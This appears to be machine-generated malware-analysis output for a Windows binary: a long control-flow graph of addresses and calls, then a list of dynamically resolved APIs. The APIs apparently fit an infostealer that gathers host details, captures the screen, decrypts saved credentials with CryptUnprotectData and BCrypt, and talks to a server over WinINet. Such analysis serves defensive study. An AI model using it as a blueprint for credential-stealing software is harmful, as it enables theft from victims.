13083->13070 13085 410200 lstrcpyA 13084->13085 13086 403949 13085->13086 13087 402790 5 API calls 13086->13087 13088 403956 13087->13088 13089 4101c0 lstrcpyA 13088->13089 13090 403965 13089->13090 13091 4101c0 lstrcpyA 13090->13091 13092 403972 13091->13092 13093 4101c0 lstrcpyA 13092->13093 13094 40397f 13093->13094 13095 4101c0 lstrcpyA 13094->13095 13096 40398c 13095->13096 13097 4101c0 lstrcpyA 13096->13097 13098 403999 13097->13098 13099 4039a7 InternetOpenA StrCmpCA 13098->13099 13100 404010 InternetCloseHandle 13099->13100 13101 4039d6 13099->13101 13103 404021 13100->13103 13102 4113b0 4 API calls 13101->13102 13104 4039e4 13102->13104 13874 407790 lstrlenA 13103->13874 13105 4102e0 2 API calls 13104->13105 13107 4039f9 13105->13107 13109 410290 lstrcpyA 13107->13109 13114 403a01 13109->13114 13110 410240 2 API calls 13111 404042 13110->13111 13113 410340 3 API calls 13111->13113 13112 404081 13116 410200 lstrcpyA 13112->13116 13115 404055 13113->13115 13118 410340 3 API calls 13114->13118 13117 410290 lstrcpyA 13115->13117 13132 403f5d 13116->13132 13119 40405d 13117->13119 13120 403a23 13118->13120 13122 404064 GetProcessHeap HeapFree 13119->13122 13121 410290 lstrcpyA 13120->13121 13123 403a2b 13121->13123 13122->13112 13124 410340 3 API calls 13123->13124 13125 403a3f 13124->13125 13126 410290 lstrcpyA 13125->13126 13127 403a47 13126->13127 13128 4102e0 2 API calls 13127->13128 13129 403a57 13128->13129 13130 410290 lstrcpyA 13129->13130 13131 403a5f 13130->13131 13133 410340 3 API calls 13131->13133 13132->12562 13134 403a73 13133->13134 13135 410290 lstrcpyA 13134->13135 13136 403a7b 13135->13136 13137 410340 3 API calls 13136->13137 13138 403a8f 13137->13138 13139 410290 lstrcpyA 13138->13139 13140 403a97 13139->13140 13141 410340 3 API calls 13140->13141 13142 403ab1 13141->13142 13143 4102e0 2 API calls 13142->13143 13144 403abd 13143->13144 13145 410290 lstrcpyA 13144->13145 13146 403ac8 13145->13146 13147 403ad9 InternetConnectA 13146->13147 
13147->13100 13148 403b19 HttpOpenRequestA 13147->13148 13149 404006 InternetCloseHandle 13148->13149 13150 403b5c 13148->13150 13149->13100 13151 403b63 InternetSetOptionA 13150->13151 13152 403b7b 13150->13152 13151->13152 13153 410340 3 API calls 13152->13153 13154 403b91 13153->13154 13155 410290 lstrcpyA 13154->13155 13156 403b99 13155->13156 13157 4102e0 2 API calls 13156->13157 13158 403bac 13157->13158 13159 410290 lstrcpyA 13158->13159 13160 403bb4 13159->13160 13161 410340 3 API calls 13160->13161 13162 403bc8 13161->13162 13163 410290 lstrcpyA 13162->13163 13164 403bd0 13163->13164 13165 410340 3 API calls 13164->13165 13166 403be4 13165->13166 13167 410290 lstrcpyA 13166->13167 13168 403bec 13167->13168 13169 410340 3 API calls 13168->13169 13170 403c00 13169->13170 13171 410290 lstrcpyA 13170->13171 13172 403c08 13171->13172 13173 410340 3 API calls 13172->13173 13174 403c1c 13173->13174 13175 410290 lstrcpyA 13174->13175 13176 403c24 13175->13176 13177 4102e0 2 API calls 13176->13177 13178 403c3a 13177->13178 13179 410290 lstrcpyA 13178->13179 13180 403c42 13179->13180 13181 410340 3 API calls 13180->13181 13182 403c56 13181->13182 13183 410290 lstrcpyA 13182->13183 13184 403c5e 13183->13184 13185 410340 3 API calls 13184->13185 13186 403c72 13185->13186 13187 410290 lstrcpyA 13186->13187 13188 403c7a 13187->13188 13189 4102e0 2 API calls 13188->13189 13190 403c8d 13189->13190 13191 410290 lstrcpyA 13190->13191 13192 403c95 13191->13192 13193 410340 3 API calls 13192->13193 13194 403ca9 13193->13194 13195 410290 lstrcpyA 13194->13195 13196 403cb1 13195->13196 13197 410340 3 API calls 13196->13197 13198 403cc5 13197->13198 13199 410290 lstrcpyA 13198->13199 13200 403ccd 13199->13200 13201 410340 3 API calls 13200->13201 13202 403ce1 13201->13202 13203 410290 lstrcpyA 13202->13203 13204 403ce9 13203->13204 13205 410340 3 API calls 13204->13205 13206 403cfd 13205->13206 13207 410290 lstrcpyA 13206->13207 13208 403d05 13207->13208 13209 410340 3 API calls 
13208->13209 13210 403d1a 13209->13210 13211 410290 lstrcpyA 13210->13211 13212 403d22 13211->13212 13213 410340 3 API calls 13212->13213 13214 403d36 13213->13214 13215 410290 lstrcpyA 13214->13215 13216 403d3e 13215->13216 13217 410340 3 API calls 13216->13217 13218 403d52 13217->13218 13219 410290 lstrcpyA 13218->13219 13220 403d5a 13219->13220 13221 4102e0 2 API calls 13220->13221 13222 403d6d 13221->13222 13223 410290 lstrcpyA 13222->13223 13224 403d75 13223->13224 13225 410340 3 API calls 13224->13225 13226 403d89 13225->13226 13227 410290 lstrcpyA 13226->13227 13228 403d91 13227->13228 13229 410340 3 API calls 13228->13229 13230 403da5 13229->13230 13231 410290 lstrcpyA 13230->13231 13232 403dad 13231->13232 13233 410340 3 API calls 13232->13233 13234 403dc1 13233->13234 13235 410290 lstrcpyA 13234->13235 13236 403dc9 13235->13236 13237 410340 3 API calls 13236->13237 13238 403ddd 13237->13238 13239 410290 lstrcpyA 13238->13239 13240 403de5 13239->13240 13241 4102e0 2 API calls 13240->13241 13242 403df8 13241->13242 13243 410290 lstrcpyA 13242->13243 13244 403e00 13243->13244 13245 403e14 lstrlenA 13244->13245 13872 410530 13245->13872 13247 403e27 lstrlenA GetProcessHeap HeapAlloc 13248 403f35 InternetCloseHandle InternetCloseHandle InternetCloseHandle 13247->13248 13250 403e4b 13247->13250 13249 4101c0 lstrcpyA 13248->13249 13249->13132 13251 403e65 lstrlenA memcpy 13250->13251 13873 410530 13251->13873 13253 403e81 lstrlenA 13254 403e93 13253->13254 13255 403ea3 lstrlenA memcpy 13254->13255 13257 403ec0 13255->13257 13256 403ed8 lstrlenA 13256->13257 13257->13256 13258 403f62 13257->13258 13259 403ef6 Sleep 13257->13259 13262 403f6e GetProcessHeap HeapFree 13258->13262 13260 403f10 13259->13260 13261 403f0b 13259->13261 13264 403f1c GetProcessHeap HeapFree 13260->13264 13261->13257 13261->13260 13263 403f80 InternetReadFile 13262->13263 13265 403ff7 InternetCloseHandle 13263->13265 13268 403f9d 13263->13268 13264->13248 13264->13263 13265->13149 13266 
410340 3 API calls 13266->13268 13267 410290 lstrcpyA 13267->13268 13268->13265 13268->13266 13268->13267 13269 403fd9 InternetReadFile 13268->13269 13269->13265 13269->13268 13878 410530 13270->13878 13272 412d69 strtok_s 13275 412d84 13272->13275 13280 412e3e 13272->13280 13273 412db0 strtok_s 13273->13275 13273->13280 13274 412e8b StrCmpCA 13279 412ec0 strtok_s 13274->13279 13275->13273 13275->13274 13276 410240 lstrlenA lstrcpyA 13275->13276 13275->13280 13292 412fca 13275->13292 13276->13275 13277 410240 lstrlenA lstrcpyA 13277->13292 13278 410240 lstrlenA lstrcpyA 13278->13280 13279->13280 13281 412f4d 13279->13281 13280->12564 13280->13274 13280->13278 13280->13279 13284 413262 StrCmpCA 13280->13284 13280->13292 13281->12564 13282 413010 strtok_s 13282->13292 13295 4132d3 13282->13295 13283 41307f lstrcpyA 13879 411550 SHGetFolderPathA 13283->13879 13285 413277 StrCmpCA 13284->13285 13284->13292 13285->13292 13287 4133a0 StrCmpCA 13293 413360 strtok_s 13287->13293 13287->13295 13288 413384 StrCmpCA 13288->13293 13288->13295 13289 4133d8 StrCmpCA 13289->13293 13289->13295 13290 4133bc StrCmpCA 13290->13293 13290->13295 13291 41340c StrCmpCA 13291->13293 13291->13295 13292->13277 13292->13282 13292->13283 13292->13284 13292->13287 13292->13288 13292->13289 13292->13290 13292->13291 13292->13295 13302 4130ac lstrcpyA 13292->13302 13303 4130d8 lstrcpyA 13292->13303 13304 413104 lstrcpyA 13292->13304 13305 413130 lstrcpyA 13292->13305 13306 411550 lstrcpyA SHGetFolderPathA 13292->13306 13307 41315c lstrcpyA 13292->13307 13308 413188 lstrcpyA 13292->13308 13309 4131b4 lstrcpyA 13292->13309 13310 4131e0 lstrcpyA 13292->13310 13293->13295 13296 4134f6 13293->13296 13294 410240 2 API calls 13294->13295 13295->12564 13295->13287 13295->13288 13295->13289 13295->13290 13295->13291 13295->13293 13295->13294 13297 4134b3 StrCmpCA 13295->13297 13298 413452 StrCmpCA 13295->13298 13299 413475 StrCmpCA 13295->13299 13300 413494 StrCmpCA 13295->13300 13301 41342f StrCmpCA 
13295->13301 13296->12564 13297->13295 13298->13293 13298->13295 13299->13295 13300->13295 13301->13293 13301->13295 13302->13292 13303->13292 13304->13292 13305->13292 13306->13292 13307->13292 13308->13292 13309->13292 13310->13292 13882 410530 13311->13882 13313 412aa9 strtok_s 13314 412c24 13313->13314 13321 412ac4 13313->13321 13314->12578 13315 412b00 strtok_s 13315->13314 13315->13321 13316 412bc3 StrCmpCA 13316->13321 13317 412acb StrCmpCA 13317->13315 13318 412b92 StrCmpCA 13318->13321 13319 412b3f StrCmpCA 13319->13321 13320 410240 lstrlenA lstrcpyA 13320->13321 13321->13315 13321->13316 13321->13317 13321->13318 13321->13319 13321->13320 13323 412d8b 13321->13323 13327 412e3e 13321->13327 13322 410240 lstrlenA lstrcpyA 13322->13323 13323->13322 13325 412db0 strtok_s 13323->13325 13326 412e8b StrCmpCA 13323->13326 13323->13327 13333 412fca 13323->13333 13324 412ec0 strtok_s 13324->13327 13328 412f4d 13324->13328 13325->13323 13325->13327 13326->13324 13327->12578 13327->13324 13327->13326 13329 413262 StrCmpCA 13327->13329 13331 410240 lstrlenA lstrcpyA 13327->13331 13327->13333 13328->12578 13330 413277 StrCmpCA 13329->13330 13329->13333 13330->13333 13331->13327 13332 410240 lstrlenA lstrcpyA 13332->13333 13333->13329 13333->13332 13334 413010 strtok_s 13333->13334 13335 41307f lstrcpyA 13333->13335 13337 4133a0 StrCmpCA 13333->13337 13338 413384 StrCmpCA 13333->13338 13339 4133d8 StrCmpCA 13333->13339 13340 4133bc StrCmpCA 13333->13340 13341 41340c StrCmpCA 13333->13341 13344 4132d3 13333->13344 13346 4130ac lstrcpyA 13333->13346 13352 4130d8 lstrcpyA 13333->13352 13353 413104 lstrcpyA 13333->13353 13354 411550 lstrcpyA SHGetFolderPathA 13333->13354 13355 413130 lstrcpyA 13333->13355 13356 41315c lstrcpyA 13333->13356 13357 413188 lstrcpyA 13333->13357 13358 4131b4 lstrcpyA 13333->13358 13359 4131e0 lstrcpyA 13333->13359 13334->13333 13334->13344 13336 411550 2 API calls 13335->13336 13336->13333 13342 413360 strtok_s 13337->13342 13337->13344 
13338->13342 13338->13344 13339->13342 13339->13344 13340->13342 13340->13344 13341->13342 13341->13344 13342->13344 13345 4134f6 13342->13345 13343 410240 2 API calls 13343->13344 13344->12578 13344->13337 13344->13338 13344->13339 13344->13340 13344->13341 13344->13342 13344->13343 13347 4134b3 StrCmpCA 13344->13347 13348 413452 StrCmpCA 13344->13348 13349 413475 StrCmpCA 13344->13349 13350 413494 StrCmpCA 13344->13350 13351 41342f StrCmpCA 13344->13351 13345->12578 13346->13333 13347->13344 13348->13342 13348->13344 13349->13344 13350->13344 13351->13342 13351->13344 13352->13333 13353->13333 13354->13333 13355->13333 13356->13333 13357->13333 13358->13333 13359->13333 13883 410530 13360->13883 13362 412c59 strtok_s 13363 412d34 13362->13363 13365 412c74 13362->13365 13363->12592 13364 412cf0 StrCmpCA 13364->13365 13365->13364 13366 410240 lstrlenA lstrcpyA 13365->13366 13367 412ca5 strtok_s 13365->13367 13366->13365 13367->13363 13367->13365 13369 4101c0 lstrcpyA 13368->13369 13370 413528 13369->13370 13371 410340 3 API calls 13370->13371 13372 413538 13371->13372 13373 410290 lstrcpyA 13372->13373 13374 413540 13373->13374 13375 410340 3 API calls 13374->13375 13376 413555 13375->13376 13377 410290 lstrcpyA 13376->13377 13378 41355d 13377->13378 13379 410340 3 API calls 13378->13379 13380 413571 13379->13380 13381 410290 lstrcpyA 13380->13381 13382 413579 13381->13382 13383 410340 3 API calls 13382->13383 13384 41358d 13383->13384 13385 410290 lstrcpyA 13384->13385 13386 413595 13385->13386 13387 410340 3 API calls 13386->13387 13388 4135a9 13387->13388 13389 410290 lstrcpyA 13388->13389 13390 4135b1 13389->13390 13884 410920 GetProcessHeap HeapAlloc GetLocalTime wsprintfA 13390->13884 13392 4135bd 13393 410340 3 API calls 13392->13393 13394 4135c6 13393->13394 13395 410290 lstrcpyA 13394->13395 13396 4135ce 13395->13396 13397 410340 3 API calls 13396->13397 13398 4135e2 13397->13398 13399 410290 lstrcpyA 13398->13399 13400 4135ea 13399->13400 13401 410340 3 
API calls 13400->13401 13402 4135fe 13401->13402 13403 410290 lstrcpyA 13402->13403 13404 413606 13403->13404 13885 411120 RegOpenKeyExA 13404->13885 13406 413612 13407 410340 3 API calls 13406->13407 13408 41361b 13407->13408 13409 410290 lstrcpyA 13408->13409 13410 413623 13409->13410 13411 410340 3 API calls 13410->13411 13412 413637 13411->13412 13413 410290 lstrcpyA 13412->13413 13414 41363f 13413->13414 13415 410340 3 API calls 13414->13415 13416 413653 13415->13416 13417 410290 lstrcpyA 13416->13417 13418 41365b 13417->13418 13419 410700 7 API calls 13418->13419 13420 41366b 13419->13420 13421 4102e0 2 API calls 13420->13421 13422 413674 13421->13422 13423 410290 lstrcpyA 13422->13423 13424 41367c 13423->13424 13425 410340 3 API calls 13424->13425 13426 413697 13425->13426 13427 410290 lstrcpyA 13426->13427 13428 41369f 13427->13428 13429 410340 3 API calls 13428->13429 13430 4136b3 13429->13430 13431 410290 lstrcpyA 13430->13431 13432 4136bb 13431->13432 13433 410540 14 API calls 13432->13433 13434 4136c8 13433->13434 13435 4102e0 2 API calls 13434->13435 13436 4136d1 13435->13436 13437 410290 lstrcpyA 13436->13437 13438 4136d9 13437->13438 13439 410340 3 API calls 13438->13439 13440 4136f4 13439->13440 13441 410290 lstrcpyA 13440->13441 13442 4136fc 13441->13442 13443 410340 3 API calls 13442->13443 13444 413710 13443->13444 13445 410290 lstrcpyA 13444->13445 13446 413718 13445->13446 13447 41371f GetCurrentProcessId 13446->13447 13888 411cc0 OpenProcess 13447->13888 13450 4102e0 2 API calls 13451 413735 13450->13451 13452 410290 lstrcpyA 13451->13452 13453 41373d 13452->13453 13454 410340 3 API calls 13453->13454 13455 413758 13454->13455 13456 410290 lstrcpyA 13455->13456 13457 413760 13456->13457 13458 410340 3 API calls 13457->13458 13459 413774 13458->13459 13460 410290 lstrcpyA 13459->13460 13461 41377c 13460->13461 13462 410340 3 API calls 13461->13462 13463 413790 13462->13463 13464 410290 lstrcpyA 13463->13464 13465 413798 13464->13465 13466 
410340 3 API calls 13465->13466 13467 4137ac 13466->13467 13468 410290 lstrcpyA 13467->13468 13469 4137b4 13468->13469 13893 4107c0 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc RegOpenKeyExA 13469->13893 13472 410340 3 API calls 13473 4137c9 13472->13473 13474 410290 lstrcpyA 13473->13474 13475 4137d1 13474->13475 13476 410340 3 API calls 13475->13476 13477 4137e5 13476->13477 13478 410290 lstrcpyA 13477->13478 13479 4137ed 13478->13479 13480 410340 3 API calls 13479->13480 13481 413801 13480->13481 13482 410290 lstrcpyA 13481->13482 13483 413809 13482->13483 13901 411200 13483->13901 13486 4102e0 2 API calls 13487 41381f 13486->13487 13488 410290 lstrcpyA 13487->13488 13489 413827 13488->13489 13490 410340 3 API calls 13489->13490 13491 413842 13490->13491 13492 410290 lstrcpyA 13491->13492 13493 41384a 13492->13493 13494 410340 3 API calls 13493->13494 13495 41385e 13494->13495 13496 410290 lstrcpyA 13495->13496 13497 413866 13496->13497 13498 411200 lstrcpyA 13497->13498 13499 413873 13498->13499 13500 4102e0 2 API calls 13499->13500 13501 41387c 13500->13501 13502 410290 lstrcpyA 13501->13502 13503 413884 13502->13503 13504 410340 3 API calls 13503->13504 13505 41389f 13504->13505 13506 410290 lstrcpyA 13505->13506 13507 4138a7 13506->13507 13508 410340 3 API calls 13507->13508 13509 4138bb 13508->13509 13510 410290 lstrcpyA 13509->13510 13511 4138c3 13510->13511 13904 4108e0 GetProcessHeap HeapAlloc GetComputerNameA 13511->13904 13513 4138cf 13514 410340 3 API calls 13513->13514 13515 4138d8 13514->13515 13516 410290 lstrcpyA 13515->13516 13517 4138e0 13516->13517 13518 410340 3 API calls 13517->13518 13519 4138f4 13518->13519 13520 410290 lstrcpyA 13519->13520 13521 4138fc 13520->13521 13522 410340 3 API calls 13521->13522 13523 413910 13522->13523 13524 410290 lstrcpyA 13523->13524 13525 413918 13524->13525 13905 4108b0 GetProcessHeap HeapAlloc GetUserNameA 13525->13905 13527 413924 13528 410340 3 API calls 13527->13528 13529 41392d 13528->13529 13530 
410290 lstrcpyA 13529->13530 13531 413935 13530->13531 13532 410340 3 API calls 13531->13532 13533 413949 13532->13533 13534 410290 lstrcpyA 13533->13534 13535 413951 13534->13535 13536 410340 3 API calls 13535->13536 13537 413965 13536->13537 13538 410290 lstrcpyA 13537->13538 13539 41396d 13538->13539 13906 4110a0 7 API calls 13539->13906 13542 4102e0 2 API calls 13543 413983 13542->13543 13544 410290 lstrcpyA 13543->13544 13545 41398b 13544->13545 13546 410340 3 API calls 13545->13546 13547 4139a6 13546->13547 13548 410290 lstrcpyA 13547->13548 13549 4139ae 13548->13549 13550 410340 3 API calls 13549->13550 13551 4139c2 13550->13551 13552 410290 lstrcpyA 13551->13552 13553 4139ca 13552->13553 13909 4109f0 13553->13909 13556 4102e0 2 API calls 13557 4139e0 13556->13557 13558 410290 lstrcpyA 13557->13558 13559 4139e8 13558->13559 13560 410340 3 API calls 13559->13560 13561 413a03 13560->13561 13562 410290 lstrcpyA 13561->13562 13563 413a0b 13562->13563 13564 410340 3 API calls 13563->13564 13565 413a1f 13564->13565 13566 410290 lstrcpyA 13565->13566 13567 413a27 13566->13567 13927 410920 GetProcessHeap HeapAlloc GetLocalTime wsprintfA 13567->13927 13569 413a33 13570 410340 3 API calls 13569->13570 13571 413a3c 13570->13571 13572 410290 lstrcpyA 13571->13572 13573 413a44 13572->13573 13574 410340 3 API calls 13573->13574 13575 413a58 13574->13575 13576 410290 lstrcpyA 13575->13576 13577 413a60 13576->13577 13578 410340 3 API calls 13577->13578 13579 413a74 13578->13579 13580 410290 lstrcpyA 13579->13580 13581 413a7c 13580->13581 13928 410990 GetProcessHeap HeapAlloc GetTimeZoneInformation 13581->13928 13584 410340 3 API calls 13585 413a91 13584->13585 13586 410290 lstrcpyA 13585->13586 13587 413a99 13586->13587 13588 410340 3 API calls 13587->13588 13589 413aad 13588->13589 13590 410290 lstrcpyA 13589->13590 13591 413ab5 13590->13591 13592 410340 3 API calls 13591->13592 13593 413ac9 13592->13593 13594 410290 lstrcpyA 13593->13594 13595 413ad1 13594->13595 13596 
410340 3 API calls 13595->13596 13597 413ae5 13596->13597 13598 410290 lstrcpyA 13597->13598 13599 413aed 13598->13599 13931 410b30 GetProcessHeap HeapAlloc RegOpenKeyExA 13599->13931 13601 413af9 13602 410340 3 API calls 13601->13602 13603 413b02 13602->13603 13604 410290 lstrcpyA 13603->13604 13605 413b0a 13604->13605 13606 410340 3 API calls 13605->13606 13607 413b1e 13606->13607 13608 410290 lstrcpyA 13607->13608 13609 413b26 13608->13609 13610 410340 3 API calls 13609->13610 13611 413b3a 13610->13611 13612 410290 lstrcpyA 13611->13612 13613 413b42 13612->13613 13934 410be0 13613->13934 13616 410340 3 API calls 13617 413b57 13616->13617 13618 410290 lstrcpyA 13617->13618 13619 413b5f 13618->13619 13620 410340 3 API calls 13619->13620 13621 413b73 13620->13621 13622 410290 lstrcpyA 13621->13622 13623 413b7b 13622->13623 13624 410340 3 API calls 13623->13624 13625 413b8f 13624->13625 13626 410290 lstrcpyA 13625->13626 13627 413b97 13626->13627 13951 410ba0 GetSystemInfo wsprintfA 13627->13951 13629 413ba3 13630 410340 3 API calls 13629->13630 13631 413bac 13630->13631 13632 410290 lstrcpyA 13631->13632 13633 413bb4 13632->13633 13634 410340 3 API calls 13633->13634 13635 413bc8 13634->13635 13636 410290 lstrcpyA 13635->13636 13637 413bd0 13636->13637 13638 410340 3 API calls 13637->13638 13639 413be4 13638->13639 13640 410290 lstrcpyA 13639->13640 13641 413bec 13640->13641 13952 410cb0 GetProcessHeap HeapAlloc 13641->13952 13643 413bf8 13644 410340 3 API calls 13643->13644 13645 413c01 13644->13645 13646 410290 lstrcpyA 13645->13646 13647 413c09 13646->13647 13648 410340 3 API calls 13647->13648 13649 413c1d 13648->13649 13650 410290 lstrcpyA 13649->13650 13651 413c25 13650->13651 13652 410340 3 API calls 13651->13652 13653 413c39 13652->13653 13654 410290 lstrcpyA 13653->13654 13655 413c41 13654->13655 13955 410d30 13655->13955 13658 4102e0 2 API calls 13659 413c57 13658->13659 13660 410290 lstrcpyA 13659->13660 13661 413c5f 13660->13661 13662 410340 3 API calls 
13661->13662 13663 413c7a 13662->13663 13664 410290 lstrcpyA 13663->13664 13665 413c82 13664->13665 13666 410340 3 API calls 13665->13666 13667 413c96 13666->13667 13668 410290 lstrcpyA 13667->13668 13669 413c9e 13668->13669 13960 410fe0 13669->13960 13671 413cab 13672 4102e0 2 API calls 13671->13672 13673 413cb4 13672->13673 13674 410290 lstrcpyA 13673->13674 13675 413cbc 13674->13675 13676 410340 3 API calls 13675->13676 13677 413cd7 13676->13677 13678 410290 lstrcpyA 13677->13678 13679 413cdf 13678->13679 13680 410340 3 API calls 13679->13680 13681 413cf3 13680->13681 13682 410290 lstrcpyA 13681->13682 13683 413cfb 13682->13683 13969 410d80 13683->13969 13686 4102e0 2 API calls 13687 413d16 13686->13687 13688 410290 lstrcpyA 13687->13688 13689 413d1e 13688->13689 13690 410d80 16 API calls 13689->13690 13691 413d37 13690->13691 13692 4102e0 2 API calls 13691->13692 13693 413d40 13692->13693 13694 410290 lstrcpyA 13693->13694 13695 413d48 13694->13695 13696 410340 3 API calls 13695->13696 13697 413d63 13696->13697 13698 410290 lstrcpyA 13697->13698 13699 413d6b 13698->13699 13700 413d8a lstrlenA 13699->13700 13701 413d97 13700->13701 13702 4101c0 lstrcpyA 13701->13702 13703 413da7 13702->13703 13704 410200 lstrcpyA 13703->13704 13705 413db3 13704->13705 13706 410200 lstrcpyA 13705->13706 13707 413dbf 13706->13707 13708 410200 lstrcpyA 13707->13708 13709 413dcb 13708->13709 13710 410200 lstrcpyA 13709->13710 13711 413de1 13710->13711 13985 413e50 13711->13985 13713 413e0f 13713->12602 13715 40e806 13714->13715 13753 40e456 13714->13753 13716 410200 lstrcpyA 13715->13716 13717 40e81a 13716->13717 13719 410200 lstrcpyA 13717->13719 13718 40e4ad StrCmpCA 13718->13753 13720 40e829 13719->13720 13721 410200 lstrcpyA 13720->13721 13723 40e838 13721->13723 13722 40e5b3 StrCmpCA 13722->13753 13724 410200 lstrcpyA 13723->13724 13726 40e84e 13724->13726 13725 4101c0 lstrcpyA 13725->13753 14792 40d9c0 memset memset memset memset RegOpenKeyExA 13726->14792 13727 40e73a 

                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                • LoadLibraryA.KERNEL32(gdiplus.dll,00417538), ref: 00418D07
                                                                                                                                                                                                                                                                                • LoadLibraryA.KERNEL32(ole32.dll), ref: 00418D17
                                                                                                                                                                                                                                                                                • LoadLibraryA.KERNEL32(bcrypt.dll), ref: 00418D27
                                                                                                                                                                                                                                                                                • LoadLibraryA.KERNEL32(wininet.dll), ref: 00418D37
                                                                                                                                                                                                                                                                                • LoadLibraryA.KERNEL32(shlwapi.dll), ref: 00418D47
                                                                                                                                                                                                                                                                                • LoadLibraryA.KERNEL32(shell32.dll), ref: 00418D57
                                                                                                                                                                                                                                                                                • LoadLibraryA.KERNEL32(psapi.dll), ref: 00418D67
                                                                                                                                                                                                                                                                                • LoadLibraryA.KERNEL32(rstrtmgr.dll), ref: 00418D77
                                                                                                                                                                                                                                                                                • LoadLibraryA.KERNEL32(dbghelp.dll), ref: 00418D87
                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(77040000,CreateCompatibleBitmap), ref: 00418DA1
                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(SelectObject), ref: 00418DB7
                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(BitBlt), ref: 00418DCD
                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(DeleteObject), ref: 00418DE3
                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(CreateCompatibleDC), ref: 00418DF9
                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(70550000,GdipGetImageEncodersSize), ref: 00418E17
                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(GdipGetImageEncoders), ref: 00418E2D
                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(GdipCreateBitmapFromHBITMAP), ref: 00418E43
                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(GdiplusStartup), ref: 00418E59
                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(GdiplusShutdown), ref: 00418E6F
                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(GdipSaveImageToStream), ref: 00418E85
                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(GdipDisposeImage), ref: 00418E9B
                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(GdipFree), ref: 00418EB1
                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(768D0000,GetHGlobalFromStream), ref: 00418ECB
                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(CreateStreamOnHGlobal), ref: 00418EE1
                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(CoUninitialize), ref: 00418EF7
                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(CoInitialize), ref: 00418F0D
                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(CoCreateInstance), ref: 00418F23
                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(75790000,BCryptGenerateSymmetricKey), ref: 00418F3D
                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(BCryptCloseAlgorithmProvider), ref: 00418F53
                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(BCryptDecrypt), ref: 00418F69
                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(BCryptSetProperty), ref: 00418F7F
                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(BCryptDestroyKey), ref: 00418F95
                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(BCryptOpenAlgorithmProvider), ref: 00418FAB
                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(75A10000,GetWindowRect), ref: 00418FC9
                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(GetDesktopWindow), ref: 00418FDF
                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(GetDC), ref: 00418FF5
                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(CloseWindow), ref: 0041900B
                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(wsprintfA), ref: 00419021
                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(EnumDisplayDevicesA), ref: 00419037
                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(GetKeyboardLayoutList), ref: 0041904D
                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(CharToOemW), ref: 00419063
                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(wsprintfW), ref: 00419079
                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(76850000,RegQueryValueExA), ref: 00419093
                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(RegEnumKeyExA), ref: 004190A9
                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(RegOpenKeyExA), ref: 004190BF
                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(RegCloseKey), ref: 004190D5
                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(RegEnumValueA), ref: 004190EB
                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(75690000,CryptBinaryToStringA), ref: 00419105
                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(CryptUnprotectData), ref: 0041911B
                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(769C0000,SHGetFolderPathA), ref: 00419135
                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(ShellExecuteExA), ref: 0041914B
                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(6F8C0000,InternetOpenUrlA), ref: 00419169
                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(InternetConnectA), ref: 0041917F
                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(InternetCloseHandle), ref: 00419195
                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(InternetOpenA), ref: 004191AB
                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(HttpSendRequestA), ref: 004191C1
                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(HttpOpenRequestA), ref: 004191D7
                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(InternetReadFile), ref: 004191ED
                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(InternetCrackUrlA), ref: 00419203
                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(HttpQueryInfoA), ref: 00419219
                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(InternetSetOptionA), ref: 0041922F
                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(75D90000,StrCmpCA), ref: 00419249
                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(StrStrA), ref: 0041925F
